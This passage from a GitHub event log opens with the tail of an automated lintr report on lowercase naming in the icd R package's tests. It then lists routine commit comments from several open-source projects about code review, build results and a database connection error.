^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:334:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L334) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:338:20:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L338) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(icd9MajMinToShort(c(\"100\", \"200\"), c(\"10\", \"20\")),\n                   ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:343:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L343) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\", \"56\"), c(\"1\", \"20\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:346:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L346) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:351:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L351) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:357:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L357) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(10L, \"20\"), \"01020\")\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:358:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L358) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V10\", c(\"0\", \"1\")), c(\"V100\", \"V101\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:359:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L359) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-util.R:46:20:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-util.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                   trimCpp(c(\"123\", \" a s d f \")))\n                   ^~~~~~~\n```\n[tests/tests-deprecated/test-util.R:65:40:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-util.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(strim(\" a s d f \"), strimCpp(\" a s d f \"))\n                                       ^~~~~~~~\n```\n[tests/tests-deprecated/test-util.R:147:9:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-util.R#L147) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rs <- icd9RandomShort(1000)\n        ^~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-valid.R:469:8:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-valid.R#L469) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortN(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-valid.R:474:8:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-valid.R#L474) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortV(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-valid.R:479:8:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-valid.R#L479) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortE(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:304:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L304) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = NA)), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:305:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L305) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"\")), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:306:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L306) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"1\")), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:307:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L307) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", NA), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:308:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L308) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"\"), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:309:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L309) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"1\"), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:315:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L315) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfempty), character())\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:316:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L316) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfe2), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:317:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L317) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"trout\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:318:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L318) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"23\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:319:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L319) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:320:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L320) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = NA)), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:328:18:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L328) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"100\", mnr = mn)), \"100\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:329:18:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L329) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"10\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:330:18:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L330) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"010\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:331:18:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L331) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"001\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:332:18:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L332) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"01\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:333:18:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L333) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"1\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:339:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L339) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"1\", mnr = \"23\")), \"00123\")\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:341:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L341) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"01\", mnr = \"23\", stringsAsFactors = TRUE)),\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:344:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L344) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"001\", mnr = \"23\")), \"00123\")\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:346:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L346) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"10\", mnr = \"23\", stringsAsFactors = TRUE)),\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:349:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L349) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"010\", mnr = \"23\")), \"01023\")\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:351:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L351) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"100\", mnr = \"23\", stringsAsFactors = TRUE)),\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:357:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L357) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:359:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L359) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:361:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L361) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:362:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L362) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:366:20:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L366) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(icd9MajMinToShort(c(\"100\", \"200\"), c(\"10\", \"20\")),\n                   ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:371:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L371) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\", \"56\"), c(\"1\", \"20\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:374:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L374) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:379:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L379) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:385:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L385) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(10L, \"20\"), \"01020\")\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:386:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L386) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V10\", c(\"0\", \"1\")), c(\"V100\", \"V101\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:387:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-convert.R#L387) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-util.R:46:20:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-util.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                   trimCpp(c(\"123\", \" a s d f \")))\n                   ^~~~~~~\n```\n[tests/testthat/test-util.R:65:40:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-util.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(strim(\" a s d f \"), strimCpp(\" a s d f \"))\n                                       ^~~~~~~~\n```\n[tests/testthat/test-util.R:142:9:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-util.R#L142) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rs <- icd9RandomShort(1000)\n        ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-valid.R:504:8:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-valid.R#L504) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortN(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-valid.R:509:8:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-valid.R#L509) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortV(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-valid.R:514:8:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/testthat/test-valid.R#L514) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortE(100)\n       ^~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-19T15:30:03Z"}
{"id":"7989946758","type":"CommitCommentEvent","actor":{"login":"jrchamp"},"repo":{"name":"PHPCompatibility/PHPCompatibility"},"payload":{"comment":{"id":29766516,"position":null,"line":null,"path":null,"commit_id":"eba7501e48209d933ddb930f08830529fe6931a5","created_at":"2018-07-19T15:30:47Z","updated_at":"2018-07-19T15:30:47Z","author_association":"NONE","body":"I know this is what the documentation says, but the documentation is wrong. See https://3v4l.org/G4Pl4"}},"created_at":"2018-07-19T15:30:47Z"}
{"id":"7989962601","type":"CommitCommentEvent","actor":{"login":"marcocitus"},"repo":{"name":"citusdata/citus"},"payload":{"comment":{"id":29766553,"position":30,"line":647,"path":"src/backend/distributed/executor/multi_utility.c","commit_id":"ae7076cb1348f4e144c89d80ef1f0ab20bbd9ebe","created_at":"2018-07-19T15:33:20Z","updated_at":"2018-07-19T15:33:20Z","author_association":"MEMBER","body":"Can we still drop it if we don't give it a name?"}},"created_at":"2018-07-19T15:33:20Z"}
{"id":"7989963419","type":"CommitCommentEvent","actor":{"login":"damianoneill"},"repo":{"name":"damianoneill/nc-hammer"},"payload":{"comment":{"id":29766555,"position":9,"line":16,"path":".gitignore","commit_id":"5e26aacc026c36091aac022dadf9a28f0ee43dc2","created_at":"2018-07-19T15:33:28Z","updated_at":"2018-07-19T15:33:28Z","author_association":"OWNER","body":"Please change this back, change your test folder to be something other than results.  with this not ignored a developer could easily check this in by mistake."}},"created_at":"2018-07-19T15:33:28Z"}
{"id":"7989965000","type":"CommitCommentEvent","actor":{"login":"skaman82"},"repo":{"name":"neomilium/arduino-max7456"},"payload":{"comment":{"id":29766560,"position":null,"line":null,"path":null,"commit_id":"c1d88c474259c9432c6bdd5ed4a92b5d11139fd5","created_at":"2018-07-19T15:33:44Z","updated_at":"2018-07-19T15:33:44Z","author_association":"NONE","body":"Sorry @neomilium this is the only way I see to contact you. I am working on a GS OSD project and using the same MAX7456 Library (https://github.com/skaman82/Pocket-Groundstation) and having some issues. \r\n\r\nI have a minimosd micro module (max7456 chip) between a 5.8 video RX and my video output. OSD is working fine (the voltage indicator with the black background in the following video). But when the video feed gets a bit poorer, the OSD freaks out and flickers like this or sometime disappears for a second or two:\r\nhttps://www.youtube.com/watch?v=iRrj66cfb9g\r\nI also see a black or grey screen instead of the static i would normally see. \r\nHave you any idea how to improve this?"}},"created_at":"2018-07-19T15:33:44Z"}
{"id":"7989967178","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29766567,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-19T15:34:06Z","updated_at":"2018-07-19T15:34:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-19T15:34:06Z"}
{"id":"7989969078","type":"CommitCommentEvent","actor":{"login":"sumanmaity112"},"repo":{"name":"bahmni-msf/bahmni-mart"},"payload":{"comment":{"id":29766574,"position":22,"line":73,"path":"src/test/java/org/bahmni/mart/exports/updatestrategy/ObsIncrementalUpdateStrategyTest.java","commit_id":"93683aaaa0ba6c6cf17850ca19aa16dcad8b553f","created_at":"2018-07-19T15:34:24Z","updated_at":"2018-07-19T15:34:24Z","author_association":"CONTRIBUTOR","body":"@sai789, why do you need `MAX_EVENT_RECORD_ID` as a **String**?"}},"created_at":"2018-07-19T15:34:24Z"}
{"id":"7989973230","type":"CommitCommentEvent","actor":{"login":"notandy"},"repo":{"name":"sapcc/openstack-helm"},"payload":{"comment":{"id":29766584,"position":4,"line":4,"path":"nova/bin/db-migrate","commit_id":"4d5b3979117f8b47732cc264a9de7a64d334bc95","created_at":"2018-07-19T15:35:07Z","updated_at":"2018-07-19T15:35:07Z","author_association":"NONE","body":"Breaks on staging because nova-migrate pods aren't running in the same file-namespace as the sql database itself:\r\n\r\n`Entrypoint INFO: 2018/07/19 15:32:41 entrypoint.go:61: Resolving postgres-nova\r\nEntrypoint INFO: 2018/07/19 15:32:43 entrypoint.go:70: Dependency postgres-nova is resolved\r\npsql: could not connect to server: No such file or directory\r\n\tIs the server running locally and accepting\r\n\tconnections on Unix domain socket \"/var/run/postgresql/.s.PGSQL.5432\"?`"}},"created_at":"2018-07-19T15:35:07Z"}
{"id":"7989980945","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29766595,"position":null,"line":null,"path":null,"commit_id":"e19d1065218706aca7d837b08fbc81c2a331cf7c","created_at":"2018-07-19T15:36:20Z","updated_at":"2018-07-19T15:36:20Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-139](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-139).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-139-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-19T15:36:20Z"}
{"id":"7989981322","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29766596,"position":null,"line":null,"path":null,"commit_id":"0d828a78c982fb2289b86ec619896bfda55c29d7","created_at":"2018-07-19T15:36:24Z","updated_at":"2018-07-19T15:36:24Z","author_association":"COLLABORATOR","body":"This is fine for start.. however we intend to `#include <regex.h>` `#include \"regex.h\"` and build the files with regex(3) implementation together with a fuzzed program, or as a fuzzed program.\r\n\r\nWe might need to use `-Dregexec=__mkfuzzer_regex` etc trick for conflicting symbols in interceptors."}},"created_at":"2018-07-19T15:36:24Z"}
{"id":"7989995793","type":"CommitCommentEvent","actor":{"login":"CPColin"},"repo":{"name":"eclipse/ceylon.formatter"},"payload":{"comment":{"id":29766626,"position":17,"line":943,"path":"source/ceylon/formatter/FormattingVisitor.ceylon","commit_id":"494c42bad1a11e50736379094457e155888c628c","created_at":"2018-07-19T15:38:43Z","updated_at":"2018-07-19T15:38:43Z","author_association":"NONE","body":"This line and the other call to `writeBinaryOperator` didn't compile, for me, because it takes two arguments, so I put `fWriter` in as the first argument. Is that the right value to pass?"}},"created_at":"2018-07-19T15:38:43Z"}
{"id":"7989997085","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29766629,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-19T15:38:56Z","updated_at":"2018-07-19T15:38:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-19T15:38:56Z"}
{"id":"7990000468","type":"CommitCommentEvent","actor":{"login":"jeffgore00"},"repo":{"name":"jeffgore00/study-saturdays"},"payload":{"comment":{"id":29766641,"position":15,"line":56,"path":"w2/routes/test.js","commit_id":"4c7491b6b43e38dce4caa6d126fd49e30a820eb6","created_at":"2018-07-19T15:39:30Z","updated_at":"2018-07-19T15:39:30Z","author_association":"OWNER","body":"It looks like this newline edit was made automatically by GitHub."}},"created_at":"2018-07-19T15:39:30Z"}
{"id":"7990005618","type":"CommitCommentEvent","actor":{"login":"Kitcat22"},"repo":{"name":"bicipeng/ProgrammingAssignment2"},"payload":{"comment":{"id":29766649,"position":65,"line":58,"path":"cachematrix.R","commit_id":"4aac52392e6d70543d3c1452aa9bdab82495ac15","created_at":"2018-07-19T15:40:20Z","updated_at":"2018-07-19T15:40:20Z","author_association":"NONE","body":"Great work- well done.  Your work is clear and easy to follow"}},"created_at":"2018-07-19T15:40:20Z"}
{"id":"7990007111","type":"CommitCommentEvent","actor":{"login":"cmwshang"},"repo":{"name":"pgbackrest/pgbackrest"},"payload":{"comment":{"id":29766652,"position":5,"line":733,"path":"lib/pgBackRest/Manifest.pm","commit_id":"260a67738b6ba36edb1cfed6f8036d2bca8e57b9","created_at":"2018-07-19T15:40:35Z","updated_at":"2018-07-19T15:40:35Z","author_association":"CONTRIBUTOR","body":"Maybe we should further confirm the type here:\r\n        if ($self->dbVersion() >= PG_VERSION_90  && **$hManifest->{$strName}{type} eq 'f'**)"}},"created_at":"2018-07-19T15:40:35Z"}
{"id":"7990009282","type":"CommitCommentEvent","actor":{"login":"jrfnl"},"repo":{"name":"PHPCompatibility/PHPCompatibility"},"payload":{"comment":{"id":29766656,"position":null,"line":null,"path":null,"commit_id":"eba7501e48209d933ddb930f08830529fe6931a5","created_at":"2018-07-19T15:40:56Z","updated_at":"2018-07-19T15:40:56Z","author_association":"COLLABORATOR","body":"@jrchamp So...according to you... what is the right info ? I've actually seen several applications run into real-world problems because of this param not providing the expected information."}},"created_at":"2018-07-19T15:40:56Z"}
{"id":"7990010114","type":"CommitCommentEvent","actor":{"login":"cmwshang"},"repo":{"name":"pgbackrest/pgbackrest"},"payload":{"comment":{"id":29766658,"position":37,"line":765,"path":"lib/pgBackRest/Manifest.pm","commit_id":"260a67738b6ba36edb1cfed6f8036d2bca8e57b9","created_at":"2018-07-19T15:41:04Z","updated_at":"2018-07-19T15:41:04Z","author_association":"CONTRIBUTOR","body":"And also confirm the type here:\r\n                        if (exists($hManifest->{$strFileNode}) **&& $hManifest->{$strName}{type} eq 'f'**)"}},"created_at":"2018-07-19T15:41:04Z"}
